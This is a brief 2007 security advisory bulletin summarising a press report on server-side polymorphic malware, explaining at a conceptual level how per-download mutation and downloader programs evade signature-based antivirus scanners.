NOW READ THIS
("Security Advisory")
Submitted by: Bill Hickey
NCVA List Master
NRT-0350 Server-Side Polymorphism Challenges AntiVirus Industry:
A new trend in mutating malware has been identified in which malware is being recreated
by the server that disseminates it - a concept often called pseudo-polymorphism, according
to an online press report. Until the user connects to the malware generator located on a
web server, the particular malicious variant that will come to infect their computer does
not exist. The malware generator starts with a copy of a malware program and renames
internal variables, subroutines, and program logic locations. It then re-encodes or packs
the program using a different packing engine. Additionally program instructions and
subroutines get moved around, encoded with arbitrary ASCII characters, and even the
malicious payload is recreated on the fly.
This server-side polymorphism is an extension of the trend toward much of today's malware
being distributed by infected web sites. Rogue code installed in the web site can exploit
vulnerabilities in site visitors' systems, or can use social engineering to trick the user
into downloading code. The first code that is downloaded to the unsuspecting user's machine
and executed is a small malicious program with only one purpose: silently install more
malicious programs. This "downloader" installs anywhere from a handful to dozens of other
malicious programs, each coming from a different infected or malicious web host on the net.
The programs and scripts used in these malicious exploits are often undetected by the
inspection of traditional anti-virus scanners. The malware signature is not recognized
because the program never existed before. Every separate user connection to an infected
web server results in a different version of essentially the same malware program.
Conventional mutating viruses could be recognized by the internal coding used to conduct
the mutating, some of which cannot be hidden if the result is going to mutate properly.
Anti-virus vendors figured out that they could forget trying to recognize the actual
malware, which could take a billion different forms. Instead they just look for the code
of the static mutation engine. Authors of polymorphic malware have tried to complicate
the process by morphing the mutation engine signature, with varying degrees of success.
However, with server-side polymorphism, the mutation engine is left on the originating
server. The malware does not have a statis mutation engine component to identify in the
first place. Add to this the fact that the mutating code is packed, and often re-packed
again many times, and anti-virus scanners have their work cut out for them.
(www.infoworld.com 26OCT07)